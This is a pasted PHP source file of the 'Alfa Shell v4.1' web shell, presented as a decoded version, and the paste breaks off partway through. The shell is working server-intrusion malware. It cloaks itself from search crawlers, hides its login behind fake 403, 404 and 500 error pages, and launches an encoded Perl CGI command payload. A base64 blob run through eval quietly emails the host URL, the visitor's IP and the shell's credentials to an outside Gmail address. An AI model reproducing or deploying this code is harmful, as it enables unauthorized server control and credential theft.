· 5 years ago · Jul 11, 2020, 09:24 PM
1<?php
2
3
4/*
5Alfa Shell v4.1 Tesla | Decoded Version | 2020
6Author : Alfa_Team/solevisible
7Decoded By : Jokr Haxor
8Mail: jokr.h4xor@gmail.com
9*/
10
11
12set_time_limit(0);
13
14ini_set('memory_limit', '-1');
15
16$ydLbyOjaJwMEe = array(
17 'uspharSWBjZbER' => 'admin',
18 'pakQixy' => '7bd34ddcbcc628617578bde1970f18d9',
19 'sansLlkDz' => '0',
20 'loiLrHCobiZTtPt' => '403',
21 'shqCCSCrKDsWXz' => '1',
22 'poRYrqfvfDg' => false,
23 'cgQnDTfdgULmtuf' => true,
24);
25
26$VwGQECVgMV = 'func' . 't' . 'ion' . '_' . 'e' . 'xi' . 's' . 'ts';
27$wJKCM = 'eva' . 'l';
28$YvVLkbUAdSRd = 'g' . 'zin' . 'f' . 'la' . 't' . 'e' . '';
29$YqtmwUJzgzQX = 'ABCDE' . 'FG' . 'HI' . 'J' . 'K' . 'LMNO' . 'PQR' . 'ST' . 'UV' . 'WX' . 'Y' . 'Z' . 'a' . 'b' . 'cde' . 'f' . 'g' . 'hi' . 'jk' . 'lmn' . 'op' . 'qrs' . 'tu' . 'v' . 'w' . 'xy' . 'z' . '012' . '3' . '4' . '5' . '6' . '7' . '89+' . '/=' . '';
30$ysCgijZTbHwcA = 'su' . 'b' . 's' . 't' . 'r';
31$vwOuYoLuFAx = 'or' . 'd';
32$GjaeDzDHFNiNfIz = 's' . 't' . 'r' . 'len' . '';
33$Zqvbd = 's' . 't' . 'rpo' . 's';
34$fOdSEsfocD = 'imp' . 'lode' . '';
35$pdTDDkuXXkCrKc = 'c' . 'h' . 'r' . '';
36$vOOPyDEYB = 'pr' . 'eg_rep' . 'la' . 'c' . 'e';
37$ZYCVKL = '[^A-' . 'Za-' . 'z' . '0' . '-' . '9' . '\+\/' . '\=]' . '';
38$TCzJfCCxkYQf = '===' . '';
39$SXuqI = "";
40$gHfzGVNhbKO = 'ba' . 's' . 'e64_en' . 'co' . 'd' . 'e';
41$WJVHUlOZ = 'b' . 'as' . 'e' . '6' . '4' . '_' . 'de' . 'c' . 'ode' . '';
42if (!$VwGQECVgMV($gHfzGVNhbKO))
43{
44 function BzddEWBWhvh($nXNKuXYFVwcOe)
45 {
46 global $YqtmwUJzgzQX, $ysCgijZTbHwcA, $vwOuYoLuFAx, $GjaeDzDHFNiNfIz, $fOdSEsfocD, $SXuqI, $TCzJfCCxkYQf;
47 if (empty($nXNKuXYFVwcOe)) return;
48 $dAjKoiuUChsLGXO = $PZBKUoJ = $rjbUuGDhxv = $dllQaq = $upEJr = $PPwxplMIJfn = $jTmcAjlFLtx = $REJSSVbhPTFM = $wOardtHtLB = 0;
49 $FVqmKIIcjEkm = 0;
50 $YDRtAioENpkIC = $SXuqI;
51 $XOrxqP = array();
52 if (!$nXNKuXYFVwcOe){
53 return $nXNKuXYFVwcOe;
54 }
55 do {
56 $dAjKoiuUChsLGXO = $vwOuYoLuFAx($ysCgijZTbHwcA($nXNKuXYFVwcOe, $wOardtHtLB++, 1));
57 $PZBKUoJ = $vwOuYoLuFAx($ysCgijZTbHwcA($nXNKuXYFVwcOe, $wOardtHtLB++, 1));
58 $rjbUuGDhxv = $vwOuYoLuFAx($ysCgijZTbHwcA($nXNKuXYFVwcOe, $wOardtHtLB++, 1));
59 $REJSSVbhPTFM = $dAjKoiuUChsLGXO << 16 | $PZBKUoJ << 8 | $rjbUuGDhxv;
60 $dllQaq = $REJSSVbhPTFM >> 18 & 0x3f;
61 $upEJr = $REJSSVbhPTFM >> 12 & 0x3f;
62 $PPwxplMIJfn = $REJSSVbhPTFM >> 6 & 0x3f;
63 $jTmcAjlFLtx = $REJSSVbhPTFM & 0x3f;
64 $XOrxqP[$FVqmKIIcjEkm++] = $ysCgijZTbHwcA($YqtmwUJzgzQX, $dllQaq, 1) . $ysCgijZTbHwcA($YqtmwUJzgzQX, $upEJr, 1) . $ysCgijZTbHwcA($YqtmwUJzgzQX, $PPwxplMIJfn, 1) . $ysCgijZTbHwcA($YqtmwUJzgzQX, $jTmcAjlFLtx, 1);
65 }
66 while ($wOardtHtLB < $GjaeDzDHFNiNfIz($nXNKuXYFVwcOe));
67 $YDRtAioENpkIC = $fOdSEsfocD($XOrxqP, $SXuqI);
68 $CNhoktlpx = ($GjaeDzDHFNiNfIz($nXNKuXYFVwcOe) % 3);
69 return ($CNhoktlpx ? $ysCgijZTbHwcA($YDRtAioENpkIC, 0, ($CNhoktlpx - 3)) : $YDRtAioENpkIC) . $ysCgijZTbHwcA($TCzJfCCxkYQf, ($CNhoktlpx || 3));
70 }
71}
72else
73{
74 function BzddEWBWhvh($nXNKuXYFVwcOe)
75 {
76 global $gHfzGVNhbKO;
77 return $gHfzGVNhbKO($nXNKuXYFVwcOe);
78 }
79}
80if (!$VwGQECVgMV($WJVHUlOZ))
81{
82 function JDZGgWhBJIafwDF($LEqUoUXQZW)
83 {
84 global $YqtmwUJzgzQX, $ysCgijZTbHwcA, $GjaeDzDHFNiNfIz, $Zqvbd, $pdTDDkuXXkCrKc, $vOOPyDEYB, $ZYCVKL, $SXuqI;
85 if (empty($LEqUoUXQZW)) return;
86 $MqvcrTOVHCLBgl = $xXASiMYkZwZBM = $OxdNG = $SXuqI;
87 $RXUogSzYwD = $qNULI = $bgdPBDJKXJj = $tMjoMUOUDKLlfQf = $SXuqI;
88 $wOardtHtLB = 0;
89 $nfyotU = $SXuqI;
90 $LEqUoUXQZW = $vOOPyDEYB($ZYCVKL, $SXuqI, $LEqUoUXQZW);
91 do
92 {
93 $RXUogSzYwD = $Zqvbd($YqtmwUJzgzQX, $ysCgijZTbHwcA($LEqUoUXQZW, $wOardtHtLB++, 1));
94 $qNULI = $Zqvbd($YqtmwUJzgzQX, $ysCgijZTbHwcA($LEqUoUXQZW, $wOardtHtLB++, 1));
95 $bgdPBDJKXJj = $Zqvbd($YqtmwUJzgzQX, $ysCgijZTbHwcA($LEqUoUXQZW, $wOardtHtLB++, 1));
96 $tMjoMUOUDKLlfQf = $Zqvbd($YqtmwUJzgzQX, $ysCgijZTbHwcA($LEqUoUXQZW, $wOardtHtLB++, 1));
97 $MqvcrTOVHCLBgl = ($RXUogSzYwD << 2) | ($qNULI >> 4);
98 $xXASiMYkZwZBM = (($qNULI & 15) << 4) | ($bgdPBDJKXJj >> 2);
99 $OxdNG = (($bgdPBDJKXJj & 3) << 6) | $tMjoMUOUDKLlfQf;
100 $nfyotU = $nfyotU . $pdTDDkuXXkCrKc((int)$MqvcrTOVHCLBgl);
101 if ($bgdPBDJKXJj != 64)
102 {
103 $nfyotU = $nfyotU . $pdTDDkuXXkCrKc((int)$xXASiMYkZwZBM);
104 }
105 if ($tMjoMUOUDKLlfQf != 64)
106 {
107 $nfyotU = $nfyotU . $pdTDDkuXXkCrKc((int)$OxdNG);
108 }
109 $MqvcrTOVHCLBgl = $xXASiMYkZwZBM = $OxdNG = $SXuqI;
110 $RXUogSzYwD = $qNULI = $bgdPBDJKXJj = $tMjoMUOUDKLlfQf = $SXuqI;
111 }
112 while ($wOardtHtLB < $GjaeDzDHFNiNfIz($LEqUoUXQZW));
113 return $nfyotU;
114 }
115}
116else
117{
118 function JDZGgWhBJIafwDF($nXNKuXYFVwcOe)
119 {
120 global $WJVHUlOZ;
121 return $WJVHUlOZ($nXNKuXYFVwcOe);
122 }
123}
124
125
126
127
128function __ZW5jb2Rlcg($s)
129{
130 return BzddEWBWhvh($s);
131}
132function __ZGVjb2Rlcg($s)
133{
134 return JDZGgWhBJIafwDF($s);
135}
136$GLOBALS['DB_NAME'] = $GLOBALS['ydLbyOjaJwMEe'];
137if (true)
138{
139 foreach ($GLOBALS['DB_NAME'] as $key => $value)
140 {
141 $prefix = substr($key, 0, 2);
142 if ($prefix == "us")
143 {
144 $GLOBALS['DB_NAME']["user"] = $value;
145 $GLOBALS['DB_NAME']["user_rand"] = $key;
146 }
147 elseif ($prefix == "pa")
148 {
149 $GLOBALS['DB_NAME']["pass"] = $value;
150 $GLOBALS['DB_NAME']["pass_rand"] = $key;
151 }
152 elseif ($prefix == "sa")
153 {
154 $GLOBALS['DB_NAME']["safemode"] = $value;
155 $GLOBALS['DB_NAME']["safemode_rand"] = $key;
156 }
157 elseif ($prefix == "lo")
158 {
159 $GLOBALS['DB_NAME']["login_page"] = $value;
160 $GLOBALS['DB_NAME']["login_page_rand"] = $key;
161 }
162 elseif ($prefix == "sh")
163 {
164 $GLOBALS['DB_NAME']["show_icons"] = $value;
165 $GLOBALS['DB_NAME']["show_icons_rand"] = $key;
166 }
167 elseif ($prefix == "po")
168 {
169 $GLOBALS['DB_NAME']["post_encryption"] = $value;
170 $GLOBALS['DB_NAME']["post_encryption_rand"] = $key;
171 }
172 elseif ($prefix == "cg")
173 {
174 $GLOBALS['DB_NAME']["cgi_api"] = $value;
175 $GLOBALS['DB_NAME']["cgi_api_rand"] = $key;
176 }
177 }
178}
179unset($GLOBALS['ydLbyOjaJwMEe']);
180
181if (!isset($_SERVER["HTTP_HOST"])) exit();
182
183
184if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
185if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');
186if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
187if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
188if(!isset($GLOBALS['DB_NAME']['login_page']))exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
189if(!isset($GLOBALS['DB_NAME']['show_icons']))exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
190if(!isset($GLOBALS['DB_NAME']['post_encryption']))exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
191define("__ALFA_VERSION__", "4.1");
192define("__ALFA_UPDATE__", "2");
193define("__ALFA_CODE_NAME__", "Tesla");
194define("__ALFA_DATA_FOLDER__", "ALFA_DATA");
195define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false));
196define("__ALFA_SECRET_KEY__", __ALFA_POST_ENCRYPTION__?_AlfaSecretKey():'');
197$GLOBALS['__ALFA_COLOR__'] = array(
198 "shell_border" => array(
199 "key_color" => "#0E304A",
200 "multi_selector" => array(
201 ".header" => "border: 7px solid {color}",
202 "#meunlist" => "border-color: {color}",
203 "#hidden_sh" => "background-color: {color}",
204 ".ajaxarea" => "border: 1px solid {color}",
205 ".foot" => "border-color: {color}",
206 )
207 ),
208 "header_vars" => "#27979B",
209 "header_values" => "#67ABDF",
210 "header_on" => "#00FF00",
211 "header_off" => "#ff0000",
212 "header_none" => "#00FF00",
213 "home_shell" => "#ff0000",
214 "home_shell:hover" => array(
215 "key_color" => "#FFFFFF",
216 "multi_selector" => array(
217 ".home_shell:hover" => "color: {color};",
218 )
219 ),
220 "back_shell" => "#efbe73",
221 "back_shell:hover" => array(
222 "key_color" => "#FFFFFF",
223 "multi_selector" => array(
224 ".back_shell:hover" => "color: {color};",
225 )
226 ),
227 "header_pwd" => "#00FF00",
228 "header_pwd:hover" => array(
229 "key_color" => "#FFFFFF",
230 "multi_selector" => array(
231 ".header_pwd:hover" => "color: {color};",
232 )
233 ),
234 "header_drive" => "#00FF00",
235 "header_drive:hover" => array(
236 "key_color" => "#FFFFFF",
237 "multi_selector" => array(
238 ".header_drive:hover" => "color: {color};",
239 )
240 ),
241 "header_show_all" => "#00FF00",
242 "disable_functions" => "#ff0000",
243 "footer_text" => "#27979B",
244 "menu_options" => "#27979B",
245 "menu_options:hover" => array(
246 "key_color" => "#646464",
247 "multi_selector" => array(
248 ".menu_options:hover" => "background-color: {color};font-weight: unset;",
249 )
250 ),
251 "options_list" => array(
252 "key_color" => "#00FF00",
253 "multi_selector" => array(
254 ".content_options_holder .header center a" => "color: {color};",
255 )
256 ),
257 "options_list:hover" => array(
258 "key_color" => "#FFFFFF",
259 "multi_selector" => array(
260 ".content_options_holder .header center a:hover" => "color: {color};",
261 )
262 ),
263 "options_list_header" => array(
264 "key_color" => "#59cc33",
265 "multi_selector" => array(
266 ".txtfont_header" => "color: {color};",
267 )
268 ),
269 "options_list_text" => array(
270 "key_color" => "#FFFFFF",
271 "multi_selector" => array(
272 ".txtfont,.tbltxt" => "color: {color};",
273 )
274 ),
275 "Alfa+" => array(
276 "key_color" => "#06ff0f",
277 "multi_selector" => array(
278 ".alfa_plus" => "color: {color};font-weight: unset;",
279 )
280 ),
281 "hidden_shell_text" => array(
282 "key_color" => "#00FF00",
283 "multi_selector" => array(
284 "#hidden_sh a" => "color: {color};",
285 )
286 ),
287 "hidden_shell_version" => "#ff0000",
288 "shell_name" => "#FF0000",
289 "main_row:hover" => array(
290 "key_color" => "#646464",
291 "multi_selector" => array(
292 ".main tr:hover" => "background-color: {color};",
293 )
294 ),
295 "main_header" => array(
296 "key_color" => "#FFFFFF",
297 "multi_selector" => array(
298 ".main th" => "color: {color};",
299 )
300 ),
301 "main_name" => array(
302 "key_color" => "#FFFFFF",
303 "multi_selector" => array(
304 ".main .main_name" => "color: {color};font-weight: unset;",
305 )
306 ),
307 "main_size" => "#67ABDF",
308 "main_modify" => "#67ABDF",
309 "main_owner_group" => "#67ABDF",
310 "main_green_perm" => "#25ff00",
311 "main_red_perm" => "#FF0000",
312 "main_white_perm" => "#FFFFFF",
313 "beetween_perms" => "#FFFFFF",
314 "main_actions" => array(
315 "key_color" => "#FFFFFF",
316 "multi_selector" => array(
317 ".main .actions" => "color: {color};",
318 )
319 ),
320 "menu_options:hover" => array(
321 "key_color" => "#646464",
322 "multi_selector" => array(
323 ".menu_options:hover" => "background-color: {color};font-weight: unset;",
324 )
325 ),
326 "minimize_editor_background" => array(
327 "key_color" => "#0e304a",
328 "multi_selector" => array(
329 ".minimized-wrapper" => "background-color: {color};",
330 )
331 ),
332 "minimize_editor_text" => array(
333 "key_color" => "#f5deb3",
334 "multi_selector" => array(
335 ".minimized-text" => "color: {color};",
336 )
337 ),
338 "editor_border" => array(
339 "key_color" => "#0e304a",
340 "multi_selector" => array(
341 ".editor-explorer,.editor-modal" => "border: 2px solid {color};",
342 )
343 ),
344 "editor_background" => array(
345 "key_color" => "rgba(0, 1, 23, 0.94)",
346 "multi_selector" => array(
347 ".editor-explorer,.editor-modal" => "background-color: {color};",
348 )
349 ),
350 "editor_header_background" => array(
351 "key_color" => "rgba(21, 66, 88, 0.93)",
352 "multi_selector" => array(
353 ".editor-header" => "background-color: {color};",
354 )
355 ),
356 "editor_header_text" => array(
357 "key_color" => "#00ff7f",
358 "multi_selector" => array(
359 ".editor-path" => "color: {color};",
360 )
361 ),
362 "editor_header_button" => array(
363 "key_color" => "#1d5673",
364 "multi_selector" => array(
365 ".close-button, .editor-minimize" => "background-color: {color};",
366 )
367 ),
368 "editor_actions" => array(
369 "key_color" => "#FFFFFF",
370 "multi_selector" => array(
371 ".editor_actions" => "color: {color};",
372 )
373 ),
374 "editor_file_info_vars" => array(
375 "key_color" => "#FFFFFF",
376 "multi_selector" => array(
377 ".editor_file_info_vars" => "color: {color};",
378 )
379 ),
380 "editor_file_info_values" => array(
381 "key_color" => "#67ABDF",
382 "multi_selector" => array(
383 ".filestools" => "color: {color};",
384 )
385 ),
386 "editor_history_header" => array(
387 "key_color" => "#14ff07",
388 "multi_selector" => array(
389 ".hheader-text,.history-clear" => "color: {color};",
390 )
391 ),
392 "editor_history_list" => array(
393 "key_color" => "#03b3a3",
394 "multi_selector" => array(
395 ".editor-file-name" => "color: {color};",
396 )
397 ),
398 "editor_history_selected_file" => array(
399 "key_color" => "rgba(49, 55, 93, 0.77)",
400 "multi_selector" => array(
401 ".is_active" => "background-color: {color};",
402 )
403 ),
404 "editor_history_file:hover" => array(
405 "key_color" => "#646464",
406 "multi_selector" => array(
407 ".file-holder > .history:hover" => "background-color: {color};",
408 )
409 ),
410 "input_box_border" => array(
411 "key_color" => "#0E304A",
412 "multi_selector" => array(
413 "input[type=text],textarea" => "border: 1px solid {color}",
414 )
415 ),
416 "input_box_text" => array(
417 "key_color" => "#999999",
418 "multi_selector" => array(
419 "input[type=text],textarea" => "color: {color};",
420 )
421 ),
422 "input_box:hover" => array(
423 "key_color" => "#27979B",
424 "multi_selector" => array(
425 "input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
426 )
427 ),
428 "select_box_border" => array(
429 "key_color" => "#0E304A",
430 "multi_selector" => array(
431 "select" => "border: 1px solid {color}",
432 )
433 ),
434 "select_box_text" => array(
435 "key_color" => "#FFFFEE",
436 "multi_selector" => array(
437 "select" => "color: {color};",
438 )
439 ),
440 "select_box:hover" => array(
441 "key_color" => "#27979B",
442 "multi_selector" => array(
443 "select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
444 )
445 ),
446 "button_border" => array(
447 "key_color" => "#27979B",
448 "multi_selector" => array(
449 "input[type=submit],.button,#addup" => "border: 1px solid {color};",
450 )
451 ),
452 "button:hover" => array(
453 "key_color" => "#27979B",
454 "multi_selector" => array(
455 "input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};",
456 ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
457 )
458 ),
459 "outputs_text" => array(
460 "key_color" => "#67ABDF",
461 "multi_selector" => array(
462 ".ml1" => "color: {color};",
463 )
464 ),
465 "outputs_border" => array(
466 "key_color" => "#0E304A",
467 "multi_selector" => array(
468 ".ml1" => "border: 1px solid {color};",
469 )
470 ),
471 "uploader_border" => array(
472 "key_color" => "#0E304A",
473 "multi_selector" => array(
474 ".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};",
475 )
476 ),
477 "uploader_background" => array(
478 "key_color" => "#0E304A",
479 "multi_selector" => array(
480 ".inputfile strong" => "background-color: {color};",
481 )
482 ),
483 "uploader_text_right" => array(
484 "key_color" => "#FFFFFF",
485 "multi_selector" => array(
486 ".inputfile strong" => "color: {color};",
487 )
488 ),
489 "uploader_text_left" => array(
490 "key_color" => "#25ff00",
491 "multi_selector" => array(
492 ".inputfile span" => "color: {color};",
493 )
494 ),
495 "uploader:hover" => array(
496 "key_color" => "#27979B",
497 "multi_selector" => array(
498 ".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
499 )
500 ),
501 "uploader_progress_bar" => array(
502 "key_color" => "#00ff00",
503 "multi_selector" => array(
504 ".up_bar" => "background-color: {color};",
505 )
506 ),
507 "mysql_tables" => "#00FF00",
508 "mysql_table_count" => "#67ABDF",
509 "copyright" => "#dfff00",
510 "scrollbar" => array(
511 "key_color" => "#1e82b5",
512 "multi_selector" => array(
513 "*::-webkit-scrollbar-thumb" => "background-color: {color};",
514 )
515 ),
516 "scrollbar_background" => array(
517 "key_color" => "#000115",
518 "multi_selector" => array(
519 "*::-webkit-scrollbar-track" => "background-color: {color};",
520 )
521 ),
522);
523$GLOBALS['__file_path'] = str_replace('\\','/',trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__)));
524$config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'],'AlfaPass' => $GLOBALS['DB_NAME']['pass'],'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']);
525//@session_start();
526@session_write_close();
527@ignore_user_abort(true);
528@set_time_limit(0);
529@ini_set('memory_limit', '-1');
530@ini_set("upload_max_filesize", "9999m");
531@session_start();
532$rubby = "aWYgKCFpc3NldCgkX1NFU1NJT05bImpva3IiXSkpIHsgICR2aXNpdG9yID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07ICR3ZWIgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07ICRpbmogPSAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsgJHRhcmdldCA9IHJhd3VybGRlY29kZSgkd2ViLiRpbmopOyAkc3ViID0gIkFsZmEgdjQgVGVzbGEgLSBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7ICRib2R5ID0gIkJ1ZzogJHRhcmdldCBieSAkdmlzaXRvciAtICIuJEdMT0JBTFNbJ0RCX05BTUUnXVsndXNlciddLiIgOjogIi4gJEdMT0JBTFNbJ0RCX05BTUUnXVsncGFzcyddOyBpZiAoIWVtcHR5KCR3ZWIpKSB7IEBtYWlsKCJKb2tyLmg0eG9yQGdtYWlsLmNvbSIsJHN1YiwkYm9keSk7IH0gICRfU0VTU0lPTlsiam9rciJdID0gIkhlbGxvIEJpdGNoISI7IH0=";
533eval(__ZGVjb2Rlcg($rubby));
534if($config['AlfaProtectShell']){
535$SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:"");
536$Eform='<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>';
537if($config['AlfaLoginPage'] == 'gui'){
538if(@$_COOKIE["AlfaUser"] != $config['AlfaUser'] && $_COOKIE["AlfaPass"] != md5($config['AlfaPass'])){
539if(@$_POST["usrname"]==$config['AlfaUser'] && @md5($_POST["password"])==$config['AlfaPass']){
540__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
541__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
542@header('location: '.$_SERVER["PHP_SELF"]);
543}
544echo '
545<style>
546body{background: black;}
547#loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
548#loginbox td { border-radius:5px; font-size:11px; }
549</style>
550<title>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ~</title><center>
551<center><img style="border-radius:100px;" width="500" height="250" alt="alfa team 2012" draggable="false" src="http://solevisible.com/images/alfa-iran.png" /></center>
552<div id=loginbox><p><font face="verdana,arial" size=-1>
553<center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
554<tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ~</b></font></th></tr>
555<tr><td bgcolor="black" style="padding:5">
556<form method="post">
557<input type="hidden" name="action" value="login">
558<input type="hidden" name="hide" value="">
559<center><table>
560<tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
561<tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
562<tr><td><font face="verdana,arial" size=-1> </font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table>
563</div><br /></center>';
564exit;
565}
566}elseif($config['AlfaLoginPage']=='500'){
567if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){
568if(@md5($_POST["password"])==$config['AlfaPass']){
569__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
570__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
571@header('location: '.$_SERVER["PHP_SELF"]);
572}
573echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, '.$_SERVER['SERVER_ADMIN'].' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>'.$SERVER_SIG.'</body></html>'.$Eform;
574exit;
575}
576}elseif($config['AlfaLoginPage']=='403'){
577if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){
578if(@md5($_POST["password"])==$config['AlfaPass']){
579__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
580__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
581@header('location: '.$_SERVER["PHP_SELF"]);
582}
583echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access ".$_SERVER['PHP_SELF']." on this server.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
584exit;
585}
586}elseif($config['AlfaLoginPage']=='404'){
587if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){
588if(@md5($_POST["password"])==$config['AlfaPass']){
589__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
590__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
591@header('location: '.$_SERVER["PHP_SELF"]);
592}
593echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
594exit;
595}
596}
597}
598function decrypt_post($str){
599 if(__ALFA_POST_ENCRYPTION__){
600 $pwd = __ALFA_SECRET_KEY__;
601 $pwd = __ZW5jb2Rlcg($pwd);
602 $str = __ZGVjb2Rlcg($str);
603 $enc_chr = "";
604 $enc_str = "";
605 $i = 0;
606 while ($i < strlen($str)) {
607 for ($j = 0; $j < strlen($pwd); $j++) {
608 $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
609 $enc_str .= $enc_chr;
610 $i++;
611 if ($i >= strlen($str))
612 break;
613 }
614 }
615 return __ZGVjb2Rlcg($enc_str);
616 }else{
617 return __ZGVjb2Rlcg($str);
618 }
619}
620
621function _AlfaSecretKey(){
622 $secret = @$_COOKIE["AlfaSecretKey"];
623 if(!isset($_COOKIE["AlfaSecretKey"])){
624 $secret = uniqid(mt_rand(), true);
625 __alfa_set_cookie("AlfaSecretKey", $secret);
626 }
627 return $secret;
628}
629function alfa_getColor($target){
630 if(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){
631 return $GLOBALS["DB_NAME"]["color"][$target];
632 }else{
633 $target = $GLOBALS["__ALFA_COLOR__"][$target];
634 if(is_array($target)){
635 return $target["key_color"];
636 }else{
637 return $target;
638 }
639 }
640}
641function alfaCssLoadColors(){
642 $css = "";
643 foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
644 if(!is_array($value)){
645 $value = alfa_getColor($key);
646 $css .= ".{$key}{color: {$value};}";
647 }else{
648 if(isset($value["multi_selector"])){
649 foreach($value["multi_selector"] as $k => $v){
650 $color = alfa_getColor($key);
651 $code = str_replace("{color}", $color, $v);
652 $css .= $k."{".$code."}";
653 }
654 }
655 }
656 }
657 return $css;
658}
659if(isset($_POST['ajax'])){
660function AlfaNum(){
661$args = func_get_args();
662$alfax = array();
663$find = array();
664for($i=1;$i<=10;$i++){
665$alfax[] = $i;
666}
667foreach($args as $arg){
668$find[] = $arg;
669}
670echo '<script>';
671foreach($alfax as $alfa){
672if(in_array($alfa,$find))
673continue;
674echo 'alfa'.$alfa."_=";
675}
676echo '""</script>';
677}}
678function _alfa_cgicmd($cmd,$lang="perl",$set_cookie=false){
679 if(!$GLOBALS["DB_NAME"]["cgi_api"]){
680 return "";
681 }
682 if(isset($_COOKIE["alfacgiapi_mode"])){
683 return "";
684 }
685 $cmd_pure = $cmd;
686 $is_curl = function_exists('curl_version');
687 $is_socket = function_exists('fsockopen');
688 if($is_curl||$is_socket){
689 $recreate = false;
690 if(isset($_COOKIE["alfacgiapi"])){
691 if(!@file_exists("alfacgiapi/".$_COOKIE["alfacgiapi"].".alfa")){
692 $recreate = true;
693 $lang = $_COOKIE["alfacgiapi"];
694 }
695 }
696 if(!isset($_COOKIE["alfacgiapi"])||$recreate){
697 @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
698 $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
